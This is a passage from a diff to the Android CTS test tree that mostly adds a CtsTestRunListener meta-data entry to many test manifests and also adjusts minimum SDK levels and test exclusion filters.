@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.util.cts"
android:label="CTS tests of android.util">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/vcn/AndroidManifest.xml b/tests/tests/vcn/AndroidManifest.xml
index 87525a1..ac0625c 100644
--- a/tests/tests/vcn/AndroidManifest.xml
+++ b/tests/tests/vcn/AndroidManifest.xml
@@ -35,6 +35,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.net.vcn.cts"
android:label="CTS tests of android.net.vcn">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/view/AndroidManifest.xml b/tests/tests/view/AndroidManifest.xml
index f6e8481..47622f7 100644
--- a/tests/tests/view/AndroidManifest.xml
+++ b/tests/tests/view/AndroidManifest.xml
@@ -513,6 +513,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.cts"
android:label="CTS tests of android.view">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/view/sdk28/AndroidManifest.xml b/tests/tests/view/sdk28/AndroidManifest.xml
index 7e6b7a7..4ebefad0 100644
--- a/tests/tests/view/sdk28/AndroidManifest.xml
+++ b/tests/tests/view/sdk28/AndroidManifest.xml
@@ -36,6 +36,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.cts.sdk28"
android:label="CTS tests of android.view">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/virtualdevice/AndroidManifest.xml b/tests/tests/virtualdevice/AndroidManifest.xml
index 68fedd7..8d99779 100644
--- a/tests/tests/virtualdevice/AndroidManifest.xml
+++ b/tests/tests/virtualdevice/AndroidManifest.xml
@@ -45,6 +45,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.virtualdevice.cts"
android:label="CTS tests of android.companion.virtual">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/voiceRecognition/AndroidManifest.xml b/tests/tests/voiceRecognition/AndroidManifest.xml
index 796c507..b402802 100644
--- a/tests/tests/voiceRecognition/AndroidManifest.xml
+++ b/tests/tests/voiceRecognition/AndroidManifest.xml
@@ -43,5 +43,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.voicerecognition.cts"
android:label="CTS tests of android voicerecognition">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/voiceinteraction/AndroidManifest.xml b/tests/tests/voiceinteraction/AndroidManifest.xml
index 50d2b0f..090c661 100644
--- a/tests/tests/voiceinteraction/AndroidManifest.xml
+++ b/tests/tests/voiceinteraction/AndroidManifest.xml
@@ -245,5 +245,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.voiceinteraction.cts"
android:label="CTS tests of android.voiceinteraction">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/voiceinteraction/AndroidTest.xml b/tests/tests/voiceinteraction/AndroidTest.xml
index 6191ac9..a69379f 100644
--- a/tests/tests/voiceinteraction/AndroidTest.xml
+++ b/tests/tests/voiceinteraction/AndroidTest.xml
@@ -49,4 +49,11 @@
<option name="package" value="android.voiceinteraction.cts" />
<option name="runtime-hint" value="11m" />
</test>
+
+ <!-- This test is included as part of GTS 11 but is built against U SDK.
+ Skip on non-U devices. -->
+ <object type="module_controller"
+ class="com.android.tradefed.testtype.suite.module.MinApiLevelModuleController">
+ <option name="min-api-level" value="34" />
+ </object>
</configuration>
diff --git a/tests/tests/voicesettings/AndroidManifest.xml b/tests/tests/voicesettings/AndroidManifest.xml
index c1ebf25..ba50604 100644
--- a/tests/tests/voicesettings/AndroidManifest.xml
+++ b/tests/tests/voicesettings/AndroidManifest.xml
@@ -40,5 +40,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.voicesettings.cts"
android:label="CTS tests of android.voicesettings">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/webkit/AndroidManifest.xml b/tests/tests/webkit/AndroidManifest.xml
index d97716c..96e9e6c 100644
--- a/tests/tests/webkit/AndroidManifest.xml
+++ b/tests/tests/webkit/AndroidManifest.xml
@@ -105,6 +105,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.webkit.cts"
android:label="CTS tests of android.webkit">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/widget/AndroidManifest.xml b/tests/tests/widget/AndroidManifest.xml
index f03dd26..a14568f 100644
--- a/tests/tests/widget/AndroidManifest.xml
+++ b/tests/tests/widget/AndroidManifest.xml
@@ -737,6 +737,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.cts"
android:label="CTS tests of android.widget">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/widget29/AndroidManifest.xml b/tests/tests/widget29/AndroidManifest.xml
index 89d63b5..d338368 100644
--- a/tests/tests/widget29/AndroidManifest.xml
+++ b/tests/tests/widget29/AndroidManifest.xml
@@ -39,6 +39,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.cts29"
android:label="(SDK 29) CTS tests of android.widget">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/wifi/AndroidManifest.xml b/tests/tests/wifi/AndroidManifest.xml
index c618fc5..b3fbee0 100644
--- a/tests/tests/wifi/AndroidManifest.xml
+++ b/tests/tests/wifi/AndroidManifest.xml
@@ -57,6 +57,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.net.wifi.cts"
android:label="CTS tests of android.net.wifi">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/video/AndroidManifest.xml b/tests/video/AndroidManifest.xml
index f0ffb88..8cdc050 100644
--- a/tests/video/AndroidManifest.xml
+++ b/tests/video/AndroidManifest.xml
@@ -30,6 +30,9 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.video.cts"
android:label="CTS tests for Video" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
</manifest>
diff --git a/tests/videocodec/AndroidManifest.xml b/tests/videocodec/AndroidManifest.xml
index 3fa4c61..14e2f31 100644
--- a/tests/videocodec/AndroidManifest.xml
+++ b/tests/videocodec/AndroidManifest.xml
@@ -31,5 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.videocodec.cts"
android:label="CTS VideoCodec tests of android.videocodec" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/vr/Android.bp b/tests/vr/Android.bp
index c396922..6b145c9 100644
--- a/tests/vr/Android.bp
+++ b/tests/vr/Android.bp
@@ -37,7 +37,7 @@
":CtsVerifierMockVrListenerServiceFiles",
],
sdk_version: "test_current",
- min_sdk_version: "14",
+ min_sdk_version: "19",
// Tag this module as a cts test artifact
test_suites: [
"cts",
diff --git a/tests/vr/AndroidManifest.xml b/tests/vr/AndroidManifest.xml
index 5925618..0196566 100644
--- a/tests/vr/AndroidManifest.xml
+++ b/tests/vr/AndroidManifest.xml
@@ -25,6 +25,8 @@
<uses-feature android:glEsVersion="0x00020000"/>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.vr.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<application android:icon="@drawable/ic_launcher"
diff --git a/tools/cts-tradefed/res/config/cts-exclude.xml b/tools/cts-tradefed/res/config/cts-exclude.xml
index 2b9e674..b754596 100644
--- a/tools/cts-tradefed/res/config/cts-exclude.xml
+++ b/tools/cts-tradefed/res/config/cts-exclude.xml
@@ -33,16 +33,4 @@
<!-- Exclude @SecurityTest tests from CTS. These are tested in STS. b/180417031-->
<option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:exclude-annotation:android.platform.test.annotations.AsbSecurityTest" />
<option name="compatibility:test-arg" value="com.android.compatibility.common.tradefed.testtype.JarHostTest:exclude-annotation:android.platform.test.annotations.AsbSecurityTest" />
-
- <!-- Exclude JvmtiHostTest911 as it's tested in MTS and depends on implementation details of the ART module. http://b/286797612 -->
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest911HostTestCases" />
- <!-- Exclude few tests as it depends on implementation details of the ART module. b/287732826 -->
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest913HostTestCases" />
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest912HostTestCases" />
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest988HostTestCases" />
-
- <!-- Exclude art_standalone_dex2oat_cts_tests which cannot link with recent
- ART module due to internal library symbol changes. b/288212464#comment5 -->
- <option name="compatibility:exclude-filter" value="art_standalone_dex2oat_cts_tests" />
-
</configuration>